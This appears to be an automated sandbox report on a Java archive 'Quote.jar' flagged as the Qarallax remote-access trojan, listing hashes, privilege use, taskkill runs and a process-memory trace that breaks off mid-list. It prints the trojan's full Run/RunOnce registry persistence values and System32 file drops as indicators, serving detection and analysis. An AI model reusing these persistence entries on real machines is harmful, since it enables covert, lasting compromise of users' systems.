Analysis
-
max time kernel
149s -
max time network
162s -
platform
windows10_x64 -
resource
win10 -
submitted
19-08-2020 14:11
Static task
static1
Behavioral task
behavioral1
Sample
Quote.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Quote.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Quote.jar
-
Size
399KB
-
MD5
59444630bce44b4d60b0ff8363c5164e
-
SHA1
03fa6c6f567e8a4777348d3f8a21bfc9fe2ae1f9
-
SHA256
4fbba6984bfcc915b229aca31711fbbbbf17883782028b72b9a080d48cd6bb87
-
SHA512
5d9abfa3a9a52dc9a68ab3e96d297389d391b4a2d30094cb4fce8cb473b52825c20c432d4e8dab91050f1dffff7630c8670337445f9b5ad6968b87c25dc5d545
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ae70-47.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 2460 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\FVKwo\Desktop.ini java.exe File created C:\Users\Admin\FVKwo\Desktop.ini java.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\jWILM java.exe File opened for modification C:\Windows\System32\jWILM java.exe -
Kills process with taskkill 16 IoCs
pid Process 1156 taskkill.exe 3780 taskkill.exe 1296 taskkill.exe 1188 taskkill.exe 2912 taskkill.exe 3532 taskkill.exe 2456 taskkill.exe 2060 taskkill.exe 668 taskkill.exe 2176 taskkill.exe 1432 taskkill.exe 1416 taskkill.exe 3960 taskkill.exe 3716 taskkill.exe 2772 taskkill.exe 3424 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 122 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 764 WMIC.exe Token: SeSecurityPrivilege 764 WMIC.exe Token: SeTakeOwnershipPrivilege 764 WMIC.exe Token: SeLoadDriverPrivilege 764 WMIC.exe Token: SeSystemProfilePrivilege 764 WMIC.exe Token: SeSystemtimePrivilege 764 WMIC.exe Token: SeProfSingleProcessPrivilege 764 WMIC.exe Token: SeIncBasePriorityPrivilege 764 WMIC.exe Token: SeCreatePagefilePrivilege 764 WMIC.exe Token: SeBackupPrivilege 764 WMIC.exe Token: SeRestorePrivilege 764 WMIC.exe Token: SeShutdownPrivilege 764 WMIC.exe Token: SeDebugPrivilege 764 WMIC.exe Token: SeSystemEnvironmentPrivilege 764 WMIC.exe Token: SeRemoteShutdownPrivilege 764 WMIC.exe Token: SeUndockPrivilege 764 WMIC.exe Token: SeManageVolumePrivilege 764 WMIC.exe Token: 33 764 WMIC.exe Token: 34 764 WMIC.exe Token: 35 764 WMIC.exe Token: 36 764 WMIC.exe Token: SeIncreaseQuotaPrivilege 764 WMIC.exe Token: SeSecurityPrivilege 764 WMIC.exe Token: SeTakeOwnershipPrivilege 764 WMIC.exe Token: SeLoadDriverPrivilege 764 WMIC.exe Token: SeSystemProfilePrivilege 764 WMIC.exe Token: SeSystemtimePrivilege 764 WMIC.exe Token: SeProfSingleProcessPrivilege 764 WMIC.exe Token: SeIncBasePriorityPrivilege 764 WMIC.exe Token: SeCreatePagefilePrivilege 764 WMIC.exe Token: SeBackupPrivilege 764 WMIC.exe Token: SeRestorePrivilege 764 WMIC.exe Token: SeShutdownPrivilege 764 WMIC.exe Token: SeDebugPrivilege 764 WMIC.exe Token: SeSystemEnvironmentPrivilege 764 WMIC.exe Token: SeRemoteShutdownPrivilege 764 WMIC.exe Token: SeUndockPrivilege 764 WMIC.exe Token: SeManageVolumePrivilege 764 WMIC.exe Token: 33 764 WMIC.exe Token: 34 764 WMIC.exe Token: 35 764 WMIC.exe Token: 36 764 WMIC.exe Token: SeIncreaseQuotaPrivilege 500 WMIC.exe Token: SeSecurityPrivilege 500 WMIC.exe Token: SeTakeOwnershipPrivilege 500 WMIC.exe Token: SeLoadDriverPrivilege 500 WMIC.exe Token: SeSystemProfilePrivilege 500 WMIC.exe Token: SeSystemtimePrivilege 500 WMIC.exe Token: SeProfSingleProcessPrivilege 500 WMIC.exe Token: SeIncBasePriorityPrivilege 500 WMIC.exe Token: SeCreatePagefilePrivilege 500 WMIC.exe Token: SeBackupPrivilege 500 WMIC.exe Token: SeRestorePrivilege 500 WMIC.exe Token: SeShutdownPrivilege 500 WMIC.exe Token: SeDebugPrivilege 500 WMIC.exe Token: SeSystemEnvironmentPrivilege 500 WMIC.exe Token: SeRemoteShutdownPrivilege 500 WMIC.exe Token: SeUndockPrivilege 500 WMIC.exe Token: SeManageVolumePrivilege 500 WMIC.exe Token: 33 500 WMIC.exe Token: 34 500 WMIC.exe Token: 35 500 WMIC.exe Token: 36 500 WMIC.exe Token: SeIncreaseQuotaPrivilege 500 WMIC.exe Token: SeSecurityPrivilege 500 WMIC.exe Token: SeTakeOwnershipPrivilege 500 WMIC.exe Token: SeLoadDriverPrivilege 500 WMIC.exe Token: SeSystemProfilePrivilege 500 WMIC.exe Token: SeSystemtimePrivilege 500 WMIC.exe Token: SeProfSingleProcessPrivilege 500 WMIC.exe Token: SeIncBasePriorityPrivilege 500 WMIC.exe Token: SeCreatePagefilePrivilege 500 WMIC.exe Token: SeBackupPrivilege 500 WMIC.exe Token: SeRestorePrivilege 500 WMIC.exe Token: SeShutdownPrivilege 500 WMIC.exe Token: SeDebugPrivilege 500 WMIC.exe Token: SeSystemEnvironmentPrivilege 500 WMIC.exe Token: SeRemoteShutdownPrivilege 500 WMIC.exe Token: SeUndockPrivilege 500 WMIC.exe Token: SeManageVolumePrivilege 500 WMIC.exe Token: 33 500 WMIC.exe Token: 34 500 WMIC.exe Token: 35 500 WMIC.exe Token: 36 500 WMIC.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 2176 taskkill.exe Token: SeIncreaseQuotaPrivilege 2536 powershell.exe Token: SeSecurityPrivilege 2536 powershell.exe Token: SeTakeOwnershipPrivilege 2536 powershell.exe Token: SeLoadDriverPrivilege 2536 powershell.exe Token: SeSystemProfilePrivilege 2536 powershell.exe Token: SeSystemtimePrivilege 2536 powershell.exe Token: SeProfSingleProcessPrivilege 2536 powershell.exe Token: SeIncBasePriorityPrivilege 2536 powershell.exe Token: SeCreatePagefilePrivilege 2536 powershell.exe Token: SeBackupPrivilege 2536 powershell.exe Token: SeRestorePrivilege 2536 powershell.exe Token: SeShutdownPrivilege 2536 powershell.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeSystemEnvironmentPrivilege 2536 powershell.exe Token: SeRemoteShutdownPrivilege 2536 powershell.exe Token: SeUndockPrivilege 2536 powershell.exe Token: SeManageVolumePrivilege 2536 powershell.exe Token: 33 2536 powershell.exe Token: 34 2536 powershell.exe Token: 35 2536 powershell.exe Token: 36 2536 powershell.exe Token: SeDebugPrivilege 2772 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 3780 taskkill.exe Token: SeDebugPrivilege 2060 taskkill.exe Token: SeDebugPrivilege 3424 taskkill.exe Token: SeDebugPrivilege 668 taskkill.exe Token: SeDebugPrivilege 1296 taskkill.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 1188 taskkill.exe Token: SeDebugPrivilege 2912 taskkill.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeDebugPrivilege 3532 taskkill.exe Token: SeDebugPrivilege 3960 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2460 java.exe -
Suspicious use of WriteProcessMemory 382 IoCs
description pid Process procid_target PID 2460 wrote to memory of 2976 2460 java.exe 68 PID 2460 wrote to memory of 2976 2460 java.exe 68 PID 2460 wrote to memory of 3628 2460 java.exe 70 PID 2460 wrote to memory of 3628 2460 java.exe 70 PID 3628 wrote to memory of 764 3628 cmd.exe 72 PID 3628 wrote to memory of 764 3628 cmd.exe 72 PID 2460 wrote to memory of 3728 2460 java.exe 73 PID 2460 wrote to memory of 3728 2460 java.exe 73 PID 3728 wrote to memory of 500 3728 cmd.exe 75 PID 3728 wrote to memory of 500 3728 cmd.exe 75 PID 2460 wrote to memory of 804 2460 java.exe 76 PID 2460 wrote to memory of 804 2460 java.exe 76 PID 2460 wrote to memory of 856 2460 java.exe 78 PID 2460 wrote to memory of 856 2460 java.exe 78 PID 2460 wrote to memory of 1232 2460 java.exe 80 PID 2460 wrote to memory of 1232 2460 java.exe 80 PID 2460 wrote to memory of 1272 2460 java.exe 81 PID 2460 wrote to memory of 1272 2460 java.exe 81 PID 2460 wrote to memory of 1528 2460 java.exe 83 PID 2460 wrote to memory of 1528 2460 java.exe 83 PID 2460 wrote to memory of 1664 2460 java.exe 85 PID 2460 wrote to memory of 1664 2460 java.exe 85 PID 2460 wrote to memory of 1784 2460 java.exe 87 PID 2460 wrote to memory of 1784 2460 java.exe 87 PID 2460 wrote to memory of 2464 2460 java.exe 89 PID 2460 wrote to memory of 2464 2460 java.exe 89 PID 2460 wrote to memory of 3612 2460 java.exe 92 PID 2460 wrote to memory of 3612 2460 java.exe 92 PID 2460 wrote to memory of 2536 2460 java.exe 94 PID 2460 wrote to memory of 2536 2460 java.exe 94 PID 2460 wrote to memory of 1940 2460 java.exe 95 PID 2460 wrote to memory of 1940 2460 java.exe 95 PID 2460 wrote to memory of 3716 2460 java.exe 96 PID 2460 wrote to memory of 3716 2460 java.exe 96 PID 2460 wrote to memory of 2520 2460 java.exe 97 PID 2460 wrote to memory of 2520 2460 java.exe 97 PID 2460 wrote to memory of 2668 2460 java.exe 101 PID 2460 wrote to memory of 2668 2460 java.exe 101 PID 2460 wrote to memory of 2364 2460 java.exe 102 PID 2460 wrote to memory of 2364 2460 java.exe 102 PID 2460 wrote to memory of 640 2460 java.exe 106 PID 2460 wrote to memory of 640 2460 java.exe 106 PID 2460 wrote to memory of 500 2460 java.exe 107 PID 2460 wrote to memory of 500 2460 java.exe 107 PID 2460 wrote to memory of 1608 2460 java.exe 110 PID 2460 wrote to memory of 1608 2460 java.exe 110 PID 2460 wrote to memory of 1808 2460 java.exe 112 PID 2460 wrote to memory of 1808 2460 java.exe 112 PID 3612 wrote to memory of 1668 3612 cmd.exe 114 PID 3612 wrote to memory of 1668 3612 cmd.exe 114 PID 2460 wrote to memory of 1772 2460 java.exe 115 PID 2460 wrote to memory of 1772 2460 java.exe 115 PID 2460 wrote to memory of 2540 2460 java.exe 117 PID 2460 wrote to memory of 2540 2460 java.exe 117 PID 2460 wrote to memory of 732 2460 java.exe 119 PID 2460 wrote to memory of 732 2460 java.exe 119 PID 2460 wrote to memory of 2064 2460 java.exe 121 PID 2460 wrote to memory of 2064 2460 java.exe 121 PID 2460 wrote to memory of 1712 2460 java.exe 123 PID 2460 wrote to memory of 1712 2460 java.exe 123 PID 2460 wrote to memory of 996 2460 java.exe 126 PID 2460 wrote to memory of 996 2460 java.exe 126 PID 3612 wrote to memory of 2184 3612 cmd.exe 128 PID 3612 wrote to memory of 2184 3612 cmd.exe 128 PID 2460 wrote to memory of 2456 2460 java.exe 129 PID 2460 wrote to memory of 2456 2460 java.exe 129 PID 2460 wrote to memory of 3660 2460 java.exe 130 PID 2460 wrote to memory of 3660 2460 java.exe 130 PID 2460 wrote to memory of 2996 2460 java.exe 133 PID 2460 wrote to memory of 2996 2460 java.exe 133 PID 2460 wrote to memory of 804 2460 java.exe 135 PID 2460 wrote to memory of 804 2460 java.exe 135 PID 2460 wrote to memory of 2052 2460 java.exe 137 PID 2460 wrote to memory of 2052 2460 java.exe 137 PID 2460 wrote to memory of 744 2460 java.exe 139 PID 2460 wrote to memory of 744 2460 java.exe 139 PID 2460 wrote to memory of 3584 2460 java.exe 141 PID 2460 wrote to memory of 3584 2460 java.exe 141 PID 2460 wrote to memory of 800 2460 java.exe 143 PID 2460 wrote to memory of 800 2460 java.exe 143 PID 800 wrote to memory of 1940 800 cmd.exe 145 PID 800 wrote to memory of 1940 800 cmd.exe 145 PID 800 wrote to memory of 2252 800 cmd.exe 146 PID 800 wrote to memory of 2252 800 cmd.exe 146 PID 2460 wrote to memory of 2176 2460 java.exe 147 PID 2460 wrote to memory of 2176 2460 java.exe 147 PID 2460 wrote to memory of 1296 2460 java.exe 148 PID 2460 wrote to memory of 1296 2460 java.exe 148 PID 1296 wrote to memory of 1116 1296 cmd.exe 151 PID 1296 wrote to memory of 1116 1296 cmd.exe 151 PID 1296 wrote to memory of 3008 1296 cmd.exe 152 PID 1296 wrote to memory of 3008 1296 cmd.exe 152 PID 2460 wrote to memory of 1692 2460 java.exe 153 PID 2460 wrote to memory of 1692 2460 java.exe 153 PID 1692 wrote to memory of 804 1692 cmd.exe 155 PID 1692 wrote to memory of 804 1692 cmd.exe 155 PID 1692 wrote to memory of 568 1692 cmd.exe 156 PID 1692 wrote to memory of 568 1692 cmd.exe 156 PID 2460 wrote to memory of 2772 2460 java.exe 158 PID 2460 wrote to memory of 2772 2460 java.exe 158 PID 2460 wrote to memory of 3224 2460 java.exe 159 PID 2460 wrote to memory of 3224 2460 java.exe 159 PID 3224 wrote to memory of 1940 3224 cmd.exe 162 PID 3224 wrote to memory of 1940 3224 cmd.exe 162 PID 3224 wrote to memory of 1416 3224 cmd.exe 163 PID 3224 wrote to memory of 1416 3224 cmd.exe 163 PID 2460 wrote to memory of 1896 2460 java.exe 164 PID 2460 wrote to memory of 1896 2460 java.exe 164 PID 1896 wrote to memory of 548 1896 cmd.exe 166 PID 1896 wrote to memory of 548 1896 cmd.exe 166 PID 1896 wrote to memory of 3168 1896 cmd.exe 167 PID 1896 wrote to memory of 3168 1896 cmd.exe 167 PID 2460 wrote to memory of 668 2460 java.exe 168 PID 2460 wrote to memory of 668 2460 java.exe 168 PID 668 wrote to memory of 3112 668 cmd.exe 170 PID 668 wrote to memory of 3112 668 cmd.exe 170 PID 668 wrote to memory of 504 668 cmd.exe 171 PID 668 wrote to memory of 504 668 cmd.exe 171 PID 2460 wrote to memory of 3660 2460 java.exe 172 PID 2460 wrote to memory of 3660 2460 java.exe 172 PID 3660 wrote to memory of 3632 3660 cmd.exe 174 PID 3660 wrote to memory of 3632 3660 cmd.exe 174 PID 3660 wrote to memory of 1720 3660 cmd.exe 175 PID 3660 wrote to memory of 1720 3660 cmd.exe 175 PID 2460 wrote to memory of 3888 2460 java.exe 176 PID 2460 wrote to memory of 3888 2460 java.exe 176 PID 3888 wrote to memory of 3336 3888 cmd.exe 178 PID 3888 wrote to memory of 3336 3888 cmd.exe 178 PID 3888 wrote to memory of 2912 3888 cmd.exe 179 PID 3888 wrote to memory of 2912 3888 cmd.exe 179 PID 2460 wrote to memory of 2684 2460 java.exe 180 PID 2460 wrote to memory of 2684 2460 java.exe 180 PID 2684 wrote to memory of 3584 2684 cmd.exe 182 PID 2684 wrote to memory of 3584 2684 cmd.exe 182 PID 2684 wrote to memory of 1028 2684 cmd.exe 183 PID 2684 wrote to memory of 1028 2684 cmd.exe 183 PID 2460 wrote to memory of 2904 2460 java.exe 184 PID 2460 wrote to memory of 2904 2460 java.exe 184 PID 2460 wrote to memory of 1156 2460 java.exe 186 PID 2460 wrote to memory of 1156 2460 java.exe 186 PID 2904 wrote to memory of 3696 2904 cmd.exe 188 PID 2904 wrote to memory of 3696 2904 cmd.exe 188 PID 2904 wrote to memory of 784 2904 cmd.exe 189 PID 2904 wrote to memory of 784 2904 cmd.exe 189 PID 2460 wrote to memory of 1552 2460 java.exe 190 PID 2460 wrote to memory of 1552 2460 java.exe 190 PID 1552 wrote to memory of 3112 1552 cmd.exe 192 PID 1552 wrote to memory of 3112 1552 cmd.exe 192 PID 1552 wrote to memory of 2508 1552 cmd.exe 193 PID 1552 wrote to memory of 2508 1552 cmd.exe 193 PID 2460 wrote to memory of 952 2460 java.exe 194 PID 2460 wrote to memory of 952 2460 java.exe 194 PID 952 wrote to memory of 2116 952 cmd.exe 196 PID 952 wrote to memory of 2116 952 cmd.exe 196 PID 952 wrote to memory of 1188 952 cmd.exe 197 PID 952 wrote to memory of 1188 952 cmd.exe 197 PID 2460 wrote to memory of 2912 2460 java.exe 198 PID 2460 wrote to memory of 2912 2460 java.exe 198 PID 2912 wrote to memory of 2720 2912 cmd.exe 200 PID 2912 wrote to memory of 2720 2912 cmd.exe 200 PID 2912 wrote to memory of 3716 2912 cmd.exe 201 PID 2912 wrote to memory of 3716 2912 cmd.exe 201 PID 2460 wrote to memory of 844 2460 java.exe 202 PID 2460 wrote to memory of 844 2460 java.exe 202 PID 844 wrote to memory of 2972 844 cmd.exe 204 PID 844 wrote to memory of 2972 844 cmd.exe 204 PID 844 wrote to memory of 1896 844 cmd.exe 205 PID 844 wrote to memory of 1896 844 cmd.exe 205 PID 2460 wrote to memory of 1112 2460 java.exe 206 PID 2460 wrote to memory of 1112 2460 java.exe 206 PID 1112 wrote to memory of 3456 1112 cmd.exe 208 PID 1112 wrote to memory of 3456 1112 cmd.exe 208 PID 1112 wrote to memory of 1224 1112 cmd.exe 209 PID 1112 wrote to memory of 1224 1112 cmd.exe 209 PID 2460 wrote to memory of 3780 2460 java.exe 210 PID 2460 wrote to memory of 3780 2460 java.exe 210 PID 2460 wrote to memory of 800 2460 java.exe 211 PID 2460 wrote to memory of 800 2460 java.exe 211 PID 800 wrote to memory of 2780 800 cmd.exe 214 PID 800 wrote to memory of 2780 800 cmd.exe 214 PID 800 wrote to memory of 3880 800 cmd.exe 215 PID 800 wrote to memory of 3880 800 cmd.exe 215 PID 2460 wrote to memory of 632 2460 java.exe 216 PID 2460 wrote to memory of 632 2460 java.exe 216 PID 632 wrote to memory of 1228 632 cmd.exe 218 PID 632 wrote to memory of 1228 632 cmd.exe 218 PID 632 wrote to memory of 3004 632 cmd.exe 219 PID 632 wrote to memory of 3004 632 cmd.exe 219 PID 2460 wrote to memory of 1848 2460 java.exe 220 PID 2460 wrote to memory of 1848 2460 java.exe 220 PID 1848 wrote to memory of 2552 1848 cmd.exe 222 PID 1848 wrote to memory of 2552 1848 cmd.exe 222 PID 1848 wrote to memory of 2056 1848 cmd.exe 223 PID 1848 wrote to memory of 2056 1848 cmd.exe 223 PID 2460 wrote to memory of 2720 2460 java.exe 224 PID 2460 wrote to memory of 2720 2460 java.exe 224 PID 2720 wrote to memory of 1116 2720 cmd.exe 226 PID 2720 wrote to memory of 1116 2720 cmd.exe 226 PID 2720 wrote to memory of 2096 2720 cmd.exe 227 PID 2720 wrote to memory of 2096 2720 cmd.exe 227 PID 2460 wrote to memory of 3164 2460 java.exe 228 PID 2460 wrote to memory of 3164 2460 java.exe 228 PID 3164 wrote to memory of 3740 3164 cmd.exe 230 PID 3164 wrote to memory of 3740 3164 cmd.exe 230 PID 3164 wrote to memory of 3376 3164 cmd.exe 231 PID 3164 wrote to memory of 3376 3164 cmd.exe 231 PID 2460 wrote to memory of 2448 2460 java.exe 232 PID 2460 wrote to memory of 2448 2460 java.exe 232 PID 2460 wrote to memory of 2060 2460 java.exe 234 PID 2460 wrote to memory of 2060 2460 java.exe 234 PID 2448 wrote to memory of 536 2448 cmd.exe 236 PID 2448 wrote to memory of 536 2448 cmd.exe 236 PID 2448 wrote to memory of 3112 2448 cmd.exe 237 PID 2448 wrote to memory of 3112 2448 cmd.exe 237 PID 2460 wrote to memory of 488 2460 java.exe 238 PID 2460 wrote to memory of 488 2460 java.exe 238 PID 488 wrote to memory of 2360 488 cmd.exe 240 PID 488 wrote to memory of 2360 488 cmd.exe 240 PID 488 wrote to memory of 3224 488 cmd.exe 241 PID 488 wrote to memory of 3224 488 cmd.exe 241 PID 2460 wrote to memory of 1448 2460 java.exe 242 PID 2460 wrote to memory of 1448 2460 java.exe 242 PID 1448 wrote to memory of 1000 1448 cmd.exe 244 PID 1448 wrote to memory of 1000 1448 cmd.exe 244 PID 1448 wrote to memory of 3008 1448 cmd.exe 245 PID 1448 wrote to memory of 3008 1448 cmd.exe 245 PID 2460 wrote to memory of 2464 2460 java.exe 246 PID 2460 wrote to memory of 2464 2460 java.exe 246 PID 2464 wrote to memory of 2972 2464 cmd.exe 248 PID 2464 wrote to memory of 2972 2464 cmd.exe 248 PID 2464 wrote to memory of 3632 2464 cmd.exe 249 PID 2464 wrote to memory of 3632 2464 cmd.exe 249 PID 2460 wrote to memory of 732 2460 java.exe 250 PID 2460 wrote to memory of 732 2460 java.exe 250 PID 732 wrote to memory of 2360 732 cmd.exe 252 PID 732 wrote to memory of 2360 732 cmd.exe 252 PID 732 wrote to memory of 3720 732 cmd.exe 253 PID 732 wrote to memory of 3720 732 cmd.exe 253 PID 2460 wrote to memory of 784 2460 java.exe 254 PID 2460 wrote to memory of 784 2460 java.exe 254 PID 2460 wrote to memory of 3424 2460 java.exe 256 PID 2460 wrote to memory of 3424 2460 java.exe 256 PID 784 wrote to memory of 404 784 cmd.exe 258 PID 784 wrote to memory of 404 784 cmd.exe 258 PID 784 wrote to memory of 3720 784 cmd.exe 259 PID 784 wrote to memory of 3720 784 cmd.exe 259 PID 2460 wrote to memory of 1028 2460 java.exe 260 PID 2460 wrote to memory of 1028 2460 java.exe 260 PID 2460 wrote to memory of 668 2460 java.exe 262 PID 2460 wrote to memory of 668 2460 java.exe 262 PID 1028 wrote to memory of 3880 1028 cmd.exe 264 PID 1028 wrote to memory of 3880 1028 cmd.exe 264 PID 1028 wrote to memory of 352 1028 cmd.exe 265 PID 1028 wrote to memory of 352 1028 cmd.exe 265 PID 2460 wrote to memory of 3532 2460 java.exe 266 PID 2460 wrote to memory of 3532 2460 java.exe 266 PID 3532 wrote to memory of 1996 3532 cmd.exe 268 PID 3532 wrote to memory of 1996 3532 cmd.exe 268 PID 3532 wrote to memory of 2520 3532 cmd.exe 269 PID 3532 wrote to memory of 2520 3532 cmd.exe 269 PID 2460 wrote to memory of 1448 2460 java.exe 270 PID 2460 wrote to memory of 1448 2460 java.exe 270 PID 1448 wrote to memory of 844 1448 cmd.exe 272 PID 1448 wrote to memory of 844 1448 cmd.exe 272 PID 1448 wrote to memory of 2464 1448 cmd.exe 273 PID 1448 wrote to memory of 2464 1448 cmd.exe 273 PID 2460 wrote to memory of 3164 2460 java.exe 274 PID 2460 wrote to memory of 3164 2460 java.exe 274 PID 3164 wrote to memory of 504 3164 cmd.exe 276 PID 3164 wrote to memory of 504 3164 cmd.exe 276 PID 3164 wrote to memory of 2688 3164 cmd.exe 277 PID 3164 wrote to memory of 2688 3164 cmd.exe 277 PID 2460 wrote to memory of 3960 2460 java.exe 278 PID 2460 wrote to memory of 3960 2460 java.exe 278 PID 3960 wrote to memory of 2052 3960 cmd.exe 280 PID 3960 wrote to memory of 2052 3960 cmd.exe 280 PID 3960 wrote to memory of 688 3960 cmd.exe 281 PID 3960 wrote to memory of 688 3960 cmd.exe 281 PID 2460 wrote to memory of 1036 2460 java.exe 282 PID 2460 wrote to memory of 1036 2460 java.exe 282 PID 1036 wrote to memory of 3368 1036 cmd.exe 284 PID 1036 wrote to memory of 3368 1036 cmd.exe 284 PID 2460 wrote to memory of 1296 2460 java.exe 285 PID 2460 wrote to memory of 1296 2460 java.exe 285 PID 1036 wrote to memory of 3376 1036 cmd.exe 287 PID 1036 wrote to memory of 3376 1036 cmd.exe 287 PID 2460 wrote to memory of 3432 2460 java.exe 288 PID 2460 wrote to memory of 3432 2460 java.exe 288 PID 3432 wrote to memory of 1004 3432 cmd.exe 290 PID 3432 wrote to memory of 1004 3432 cmd.exe 290 PID 3432 wrote to memory of 352 3432 cmd.exe 291 PID 3432 wrote to memory of 352 3432 cmd.exe 291 PID 2460 wrote to memory of 2536 2460 java.exe 292 PID 2460 wrote to memory of 2536 2460 java.exe 292 PID 2536 wrote to memory of 3660 2536 cmd.exe 294 PID 2536 wrote to memory of 3660 2536 cmd.exe 294 PID 2536 wrote to memory of 2508 2536 cmd.exe 295 PID 2536 wrote to memory of 2508 2536 cmd.exe 295 PID 2460 wrote to memory of 2456 2460 java.exe 296 PID 2460 wrote to memory of 2456 2460 java.exe 296 PID 2456 wrote to memory of 844 2456 cmd.exe 298 PID 2456 wrote to memory of 844 2456 cmd.exe 298 PID 2456 wrote to memory of 1116 2456 cmd.exe 299 PID 2456 wrote to memory of 1116 2456 cmd.exe 299 PID 2460 wrote to memory of 1940 2460 java.exe 300 PID 2460 wrote to memory of 1940 2460 java.exe 300 PID 1940 wrote to memory of 2996 1940 cmd.exe 302 PID 1940 wrote to memory of 2996 1940 cmd.exe 302 PID 1940 wrote to memory of 688 1940 cmd.exe 303 PID 1940 wrote to memory of 688 1940 cmd.exe 303 PID 2460 wrote to memory of 1836 2460 java.exe 304 PID 2460 wrote to memory of 1836 2460 java.exe 304 PID 1836 wrote to memory of 2060 1836 cmd.exe 306 PID 1836 wrote to memory of 2060 1836 cmd.exe 306 PID 1836 wrote to memory of 1432 1836 cmd.exe 307 PID 1836 wrote to memory of 1432 1836 cmd.exe 307 PID 2460 wrote to memory of 1428 2460 java.exe 308 PID 2460 wrote to memory of 1428 2460 java.exe 308 PID 1428 wrote to memory of 636 1428 cmd.exe 310 PID 1428 wrote to memory of 636 1428 cmd.exe 310 PID 1428 wrote to memory of 2716 1428 cmd.exe 311 PID 1428 wrote to memory of 2716 1428 cmd.exe 311 PID 2460 wrote to memory of 1004 2460 java.exe 312 PID 2460 wrote to memory of 1004 2460 java.exe 312 PID 1004 wrote to memory of 1664 1004 cmd.exe 314 PID 1004 wrote to memory of 1664 1004 cmd.exe 314 PID 1004 wrote to memory of 3728 1004 cmd.exe 315 PID 1004 wrote to memory of 3728 1004 cmd.exe 315 PID 2460 wrote to memory of 3660 2460 java.exe 316 PID 2460 wrote to memory of 3660 2460 java.exe 316 PID 3660 wrote to memory of 2464 3660 cmd.exe 318 PID 3660 wrote to memory of 2464 3660 cmd.exe 318 PID 3660 wrote to memory of 1264 3660 cmd.exe 319 PID 3660 wrote to memory of 1264 3660 cmd.exe 319 PID 2460 wrote to memory of 2052 2460 java.exe 320 PID 2460 wrote to memory of 2052 2460 java.exe 320 PID 2052 wrote to memory of 688 2052 cmd.exe 322 PID 2052 wrote to memory of 688 2052 cmd.exe 322 PID 2052 wrote to memory of 3988 2052 cmd.exe 323 PID 2052 wrote to memory of 3988 2052 cmd.exe 323 PID 2460 wrote to memory of 3756 2460 java.exe 324 PID 2460 wrote to memory of 3756 2460 java.exe 324 PID 3756 wrote to memory of 1896 3756 cmd.exe 326 PID 3756 wrote to memory of 1896 3756 cmd.exe 326 PID 3756 wrote to memory of 3704 3756 cmd.exe 327 PID 3756 wrote to memory of 3704 3756 cmd.exe 327 PID 2460 wrote to memory of 1520 2460 java.exe 328 PID 2460 wrote to memory of 1520 2460 java.exe 328 PID 1520 wrote to memory of 2508 1520 cmd.exe 330 PID 1520 wrote to memory of 2508 1520 cmd.exe 330 PID 1520 wrote to memory of 1116 1520 cmd.exe 331 PID 1520 wrote to memory of 1116 1520 cmd.exe 331 PID 2460 wrote to memory of 1264 2460 java.exe 332 PID 2460 wrote to memory of 1264 2460 java.exe 332 PID 1264 wrote to memory of 1016 1264 cmd.exe 334 PID 1264 wrote to memory of 1016 1264 cmd.exe 334 PID 2460 wrote to memory of 1432 2460 java.exe 335 PID 2460 wrote to memory of 1432 2460 java.exe 335 PID 1264 wrote to memory of 2096 1264 cmd.exe 337 PID 1264 wrote to memory of 2096 1264 cmd.exe 337 PID 2460 wrote to memory of 2564 2460 java.exe 338 PID 2460 wrote to memory of 2564 2460 java.exe 338 PID 2564 wrote to memory of 3776 2564 cmd.exe 340 PID 2564 wrote to memory of 3776 2564 cmd.exe 340 PID 2564 wrote to memory of 1896 2564 cmd.exe 341 PID 2564 wrote to memory of 1896 2564 cmd.exe 341 PID 2460 wrote to memory of 2144 2460 java.exe 342 PID 2460 wrote to memory of 2144 2460 java.exe 342 PID 2144 wrote to memory of 2524 2144 cmd.exe 344 PID 2144 wrote to memory of 2524 2144 cmd.exe 344 PID 2144 wrote to memory of 732 2144 cmd.exe 345 PID 2144 wrote to memory of 732 2144 cmd.exe 345 PID 2460 wrote to memory of 1188 2460 java.exe 346 PID 2460 wrote to memory of 1188 2460 java.exe 346 PID 2460 wrote to memory of 2912 2460 java.exe 348 PID 2460 wrote to memory of 2912 2460 java.exe 348 PID 2460 wrote to memory of 1416 2460 java.exe 350 PID 2460 wrote to memory of 1416 2460 java.exe 350 PID 2460 wrote to memory of 3532 2460 java.exe 352 PID 2460 wrote to memory of 3532 2460 java.exe 352 PID 